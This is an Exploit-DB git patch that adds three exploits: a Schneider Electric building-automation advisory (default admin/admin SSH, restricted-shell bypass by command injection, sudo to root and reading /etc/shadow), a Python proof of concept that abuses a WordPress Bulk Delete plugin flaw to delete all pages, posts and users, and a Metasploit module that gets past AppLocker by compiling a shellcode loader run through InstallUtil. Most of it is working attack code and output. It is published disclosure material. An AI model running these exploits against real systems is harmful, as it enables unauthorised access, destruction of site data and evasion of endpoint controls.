From b761aa35c0794598ced5588b90ad6a9d3ba2a55c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 4 Mar 2016 05:02:58 +0000
Subject: [PATCH] DB: 2016-03-04

3 new exploits
---
 files.csv                           |   3 +
 platforms/hardware/remote/39522.txt | 151 ++++++++++++++++++++++++++++
 platforms/php/webapps/39521.txt     | 134 ++++++++++++++++++++++++
 platforms/windows/local/39523.rb    | 148 +++++++++++++++++++++++++++
 4 files changed, 436 insertions(+)
 create mode 100755 platforms/hardware/remote/39522.txt
 create mode 100755 platforms/php/webapps/39521.txt
 create mode 100755 platforms/windows/local/39523.rb

diff --git a/files.csv b/files.csv
index c88e5036f..841ba5452 100755
--- a/files.csv
+++ b/files.csv
@@ -35758,3 +35758,6 @@ id,file,description,date,author,platform,type,port
 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
 39519,platforms/win32/shellcode/39519.c,"x86 Windows Null-Free Download & Run via WebDAV Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win32,shellcode,0
 39520,platforms/win64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win64,local,0
+39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80
+39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
+39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0
diff --git a/platforms/hardware/remote/39522.txt b/platforms/hardware/remote/39522.txt
new file mode 100755
index 000000000..ade5695db
--- /dev/null
+++ b/platforms/hardware/remote/39522.txt
@@ -0,0 +1,151 @@
+*# Exploit Title: [*Schneider Electric SBO / AS Multiple Vulnerabilities]
+# Discovered by: Karn Ganeshen
+# Vendor Homepage: [www.schneider-electric.com*] *
+*# Versions Reported: [*
+Automation Server Series (AS, AS-P), v1.7 and prior
+*] *
+# CVE-ID: [CVE-2016-2278]
+
+About
+Schneider Electric’s corporate headquarters is located in Paris, France,
+and it maintains offices in more than 100 countries worldwide.
+
+The affected product, Automation Server, is a building automation system
+for small and medium-sized buildings. According to Schneider Electric,
+Automation Server is deployed in the Commercial Facilities sector.
+Schneider Electric estimates that this product is used worldwide.
+
+*Vulnerabilities*
+*1. Weak credential management*
+CVE-ID: None [ Mitre, CVE? ]
+
+There are two primary users:
+a. root - password is not set by default - this is a problem as we will see
+later in the vuln findings
+- By default, root cannot SSH in.
+b. admin - default password is 'admin'
+- Anyone can remotely ssh in to the device using default admin/admin login.
+
+The system / application allows a) weak creds to start with, and more
+importantly, b) vulnerable versions lacks the mechanism to forcefully have
+the user change the initial password on first use or later. This has been
+fixed in the latest version.
+
+*2. OS Command Injection*
+*CVE-ID*: CVE-2016-2278
+*https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
+<https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01>*
+
+After logging in to the device over SSH, the 'admin' user - the only
+active, administrative user at this point - is provided a restricted shell
+(msh), which offers a small set of, application- specific functional
+options.
+
+$ ssh <IP> -l admin
+Password:
+
+Welcome! (use 'help' to list commands)
+admin@box:>
+
+admin@box:> *release*
+NAME=SE2Linux
+ID=se2linux
+PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
+VERSION_ID=0.2.0.212
+
+admin@box:>
+
+admin@box:> help
+usage: help [command]
+Type 'help [command]' for help on a specific command.
+
+Available commands:
+exit - exit this session
+ps - report a snapshot of the current processes readlog - read log files
+reboot - reboot the system
+setip - configure the network interface
+setlog - configure the logging
+setsnmp - configure the snmp service
+setsecurity - configure the security
+settime - configure the system time
+top - display Linux tasks
+uptime - tell how long the system has been running release - tell the os
+release details
+
+Attempting to run any different command will give an error message.
+
+However, this restricted shell functionality (msh) can be bypassed to
+execute underlying system commands, by appending '| <command>' to any of
+the above set of commands:
+
+admin@box:> *uptime | ls*
+bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr
+etc localization proc share var
+
+At this point, basically you have full (indirect) control over the server.
+
+admin@box:> *uptime | cat /etc/passwd *
+
+root:x:0:0:root:/:/bin/sh
+daemon:x:2:2:daemon:/sbin:/bin/false
+messagebus:x:3:3:messagebus:/sbin:/bin/false
+ntp:x:102:102:ntp:/var/empty/ntp:/bin/false
+sshd:x:103:103:sshd:/var/empty:/bin/false
+app:x:500:500:Linux Application:/:/bin/false
+admin:x:1000:1000:Linux User,,,:/:/bin/msh
+
+admin@box:> uptime | cat /etc/group
+root:x:0:
+wheel:x:1:admin
+daemon:x:2:
+messagebus:x:3:
+adm:x:5:admin
+power:x:20:app
+serial:x:21:app
+cio:x:22:app
+lon:x:23:app
+daemonsv:x:30:admin,app
+utmp:x:100:
+lock:x:101:
+ntp:x:102:
+sshd:x:103:
+app:x:500:admin
+admin:x:1000:admin
+
+*3. Privilege Escalation / access to superuser 'root'*
+CVE-ID: None [ Mitre, CVE? ]
+
+Since this is an administrative user, an attacker can exploit OS command
+injection to perform a variety of tasks from msh shell. But isn’t it better
+to get a root shell instead.!
+
+As observed from Issue 1 above, root does not have a password set, and it
+is possible to use 'sudo -i' and become root.
+
+*Note*: sudo is not presented / offered to 'admin' in the set of functional
+options available thru msh. It is required for tech guys / legit admins /
+SBO admins to manage the AS system and related functionality. Assumption
+from SE team is, a low-skilled attacker / regular, unsophisticated,
+non-technical user will not be able to figure it out. If someone does
+figure it out, he/she will be responsible enough not to go evill.!
+
+admin@box:> *sudo -i*
+
+We trust you have received the usual lecture from the local System
+Administrator. It usually boils down to these three things:
+
+#1) Respect the privacy of others.
+#2) Think before you type.
+#3) With great power comes great responsibility.
+
+Password:
+
+root@box:~> cat /etc/shadow
+root:!:16650:0:99999:7:::
+sshd:!:1:0:99999:7:::
+admin:$6$<hash>:16652:0:99999:7:::
+
++++++
+-- 
+Best Regards,
+Karn Ganeshen
diff --git a/platforms/php/webapps/39521.txt b/platforms/php/webapps/39521.txt
new file mode 100755
index 000000000..20b940efe
--- /dev/null
+++ b/platforms/php/webapps/39521.txt
@@ -0,0 +1,134 @@
+'''
+* Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation]
+* Discovery Date: 2016-02-10
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://bulkwp.com/
+* Software Link: https://wordpress.org/plugins/bulk-delete/
+* Version: 5.5.3
+* Tested on: WordPress 4.4.2
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+_Bulk Delete_ plugin for WordPress suffers from a privilege escalation
+vulnerability. Any registered user can exploit the lack of capabilities
+checks to perform all administrative tasks provided by the _Bulk Delete_
+plugin. Some of these actions, but not all, are:
+
+- `bd_delete_pages_by_status`: deletes all pages by status
+- `bd_delete_posts_by_post_type`: deletes all posts by type
+- `bd_delete_users_by_meta`: delete all users with a specific pair of
+meta name, meta value
+
+Nearly all actions registered by this plugin can be performed from any
+user, as long as they passed to a query var named `bd_action` and the
+user has a valid account. These actions would normally require
+administrative wrights, so we can consider this as a privilege
+escalation vulnerability.
+
+PoC
+---
+
+The following script will delete all pages, posts and users from the
+infected website.
+'''
+
+#!/usr/bin/python3
+
+################################################################################
+# Bulk Delete Privilege Escalation Exploit
+#
+# **IMPORTANT** Don't use this in a production site, if vulnerable it will
+# delete nearly all your sites content
+#
+# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
+################################################################################
+
+import requests
+
+loginUrl = 'http://example.com/wp-login.php'
+adminUrl = 'http://example.com/wp-admin/index.php'
+
+loginPostData = {
+'log': 'username',
+'pwd': 'password',
+'rememberme': 'forever',
+'wp-submit': 'Log+In'
+}
+
+l = requests.post(loginUrl, data=loginPostData)
+
+if l.status_code != 200 or len(l.history) == 0 or
+len(l.history[0].cookies) == 0:
+print("Couldn't acquire a valid session")
+exit(1)
+
+loggedInCookies = l.history[0].cookies
+
+def do_action(action, data):
+try:
+requests.post(
+adminUrl + '?bd_action=' + action,
+data=data,
+cookies=loggedInCookies,
+timeout=30
+)
+except TimeoutError:
+print('Action ' + action + ' timed out')
+else:
+print('Action ' + action + ' performed')
+
+print('Deleting all pages')
+do_action(
+'delete_pages_by_status',
+{
+'smbd_pages_force_delete': 'true',
+'smbd_published_pages': 'published_pages',
+'smbd_draft_pages': 'draft_pages',
+'smbd_pending_pages': 'pending_pages',
+'smbd_future_pages': 'future_pages',
+'smbd_private_pages': 'private_pages',
+}
+)
+
+print('Deleting all posts from all default post types')
+do_action('delete_posts_by_post_type', {'smbd_types[]': [
+'post',
+'page',
+'attachment',
+'revision',
+'nav_menu_item'
+]})
+
+print('Deleting all users')
+do_action(
+'delete_users_by_meta',
+{
+'smbd_u_meta_key': 'nickname',
+'smbd_u_meta_compare': 'LIKE',
+'smbd_u_meta_value': '',
+}
+)
+
+exit(0)
+
+
+'''
+Solution
+--------
+
+Upgrade to v5.5.4
+
+Timeline
+--------
+
+1. **2016-02-10**: Requested CVE ID
+2. **2016-02-10**: Vendor notified through wordpress.org support forums
+3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
+4. **2016-02-10**: Vendor responded and received details about the issue
+5. **2016-02-10**: Vendor verified vulnerability
+6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue
+'''
\ No newline at end of file
diff --git a/platforms/windows/local/39523.rb b/platforms/windows/local/39523.rb
new file mode 100755
index 000000000..549c78585
--- /dev/null
+++ b/platforms/windows/local/39523.rb
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'AppLocker Execution Prevention Bypass',
+      'Description'   => %q{
+        This module will generate a .NET service executable on the target and utilise
+        InstallUtil to run the payload bypassing the AppLocker protection.
+
+        Currently only the InstallUtil method is provided, but future methods can be
+        added easily.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Casey Smith', # Original AppLocker bypass research
+          'OJ Reeves'    # MSF module
+        ],
+      'Platform'      => [ 'win' ],
+      'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [ [ 'Windows', {} ] ],
+      'DefaultTarget' => 0,
+      'DisclosureDate'=> 'Aug 3 2015',
+      'References'    =>
+        [
+          ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
+        ]
+    ))
+
+    register_options([
+      OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
+                               'INSTALLUTIL', %w(INSTALLUTIL)])])
+  end
+
+  # Run Method for when run command is issued
+  def exploit
+    if datastore['TECHNIQUE'] == 'INSTALLUTIL'
+      if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
+        fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
+      end
+    end
+
+    # sysinfo is only on meterpreter sessions
+    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+    if datastore['TECHNIQUE'] == 'INSTALLUTIL'
+      execute_installutil
+    end
+  end
+
+  def execute_installutil
+    envs = get_envs('TEMP', 'windir')
+
+    dotnet_path = get_dotnet_path(envs['windir'])
+    print_status("Using .NET path #{dotnet_path}")
+
+    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
+    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
+
+    installutil_path = "#{dotnet_path}\\InstallUtil.exe"
+
+    print_status("Writing payload to #{cs_path}")
+    write_file(cs_path, generate_csharp_source)
+    register_files_for_cleanup(cs_path)
+
+    print_status("Compiling payload to #{exe_path}")
+    csc_path = "#{dotnet_path}\\csc.exe"
+    csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
+    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
+    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
+
+    print_status("Executing payload ...")
+    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
+    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
+    register_files_for_cleanup(exe_path)
+  end
+
+  def get_dotnet_path(windir)
+    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
+    paths = dir(base_path).select {|p| p[0] == 'v'}
+    dotnet_path = nil
+
+    paths.reverse.each do |p|
+      path = "#{base_path}\\#{p}"
+      if directory?(path) && file?("#{path}\\InstallUtil.exe")
+        dotnet_path = path
+        break
+      end
+    end
+
+    unless dotnet_path
+      fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
+    end
+
+    dotnet_path
+  end
+
+  def generate_csharp_source
+    sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
+    cs = %Q^
+using System;
+
+namespace Pop
+{
+  public class Program { public static void Main() { } }
+
+  [System.ComponentModel.RunInstaller(true)]
+  public class Pop : System.Configuration.Install.Installer
+  {
+    private static Int32 MEM_COMMIT=0x1000;
+    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+    private static UInt32 INFINITE = 0xFFFFFFFF;
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
+
+    public override void Uninstall(System.Collections.IDictionary s)
+    {
+      byte[] sc = new byte[] {#{sc}};
+      IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+      System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
+      IntPtr id = IntPtr.Zero;
+      WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
+    }
+  }
+}
+    ^
+
+    cs
+  end
+
+end